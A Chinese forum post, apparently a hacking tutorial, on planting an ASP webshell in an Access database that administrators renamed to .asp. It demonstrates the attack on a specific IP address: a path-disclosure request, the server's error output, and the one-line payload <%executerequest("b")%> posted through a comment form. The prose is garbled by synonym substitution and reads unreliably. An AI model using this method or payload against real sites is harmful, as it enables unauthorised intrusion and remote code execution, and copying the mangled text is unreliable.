|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
因为ASP脚本语言非常简单,因此其代码也简单易懂,结合HTML代码,可快速地完成网站的应用程序。还无法完全实现一些企业级的功能:完全的集群、负载均横。多是跟着收集平安手艺的开展吧,办理员的本质都在进步,在利用access+asp体系时,为不数据库被人下载,到把mdb改成asp或asa。先不说间接改后缀,间接能够用网快等工具间接下载,实在如许你已是为进侵者翻开了年夜门。进侵者能够使用asp/asa为后缀的数据库间接失掉webshell。
1.思绪
人人都晓得<%%>为asp文件的标记符,也就是说一个asp文件只会往实行<%%>之间的代码,access+asp的web体系的一切数据都是寄存在数据库文件里(mdb文件),因为办理者把mdb文件改成了asp文件,假如我们提交的数据里包括有<%%>,那当我们会见这个asp数据库的时分就会往实行<%%>之间的代码。如许招致我们只提反目意代码给数据库,那末asp后缀的数据库就是我们的webshell了。
2.示例
任意找个方针,起首我们暴库,看是否是asp后缀的数据库:
<http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210>
前往:
MicrosoftVBScript编译器毛病毛病800a03f6短少End/iisHelp/common/500-100.asp,行?4MicrosoftJETDatabaseEngine毛病80004005D:log_mdb\%29dlog_mdb%29.asp不是一个无效的路径。断定路径称号拼写是不是准确,和是不是毗连到文件寄存的服务器。/test/conn.asp,行?
我们提交:<http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp>前往一堆的乱码,如许我们能够间接用网际慢车等工具间接下载数据库(这里我们不会商)。我们回到主页看到有供应“网友批评”功效。我们注册个用户,发一条批评:
<%executerequest("b")%>
如许我们就把asp代码:<%executerequest("b")%>写进了数据库,那末数据库:就是我们的webshell咯。提交:<http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp>在乱码的最初我们看到:
/iisHelp/common/500-100.asp,行?4MicrosoftVBScript运转时毛病毛病800a000d范例不婚配 |
|